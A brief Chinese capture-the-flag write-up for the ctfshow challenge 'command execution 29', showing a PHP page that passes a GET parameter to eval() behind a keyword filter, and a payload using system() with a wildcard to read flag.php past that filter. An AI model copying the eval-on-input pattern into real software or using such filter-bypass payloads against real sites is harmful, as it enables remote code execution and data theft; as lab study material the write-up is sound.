ctfshow 命令执行29

29

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

目的是cat flag.php

flag被过滤,所以使用f*获取所有f文件

 /?c=system("cat f*");

 记得右键查看源码

原文地址:https://www.cnblogs.com/FrozenW/p/14710109.html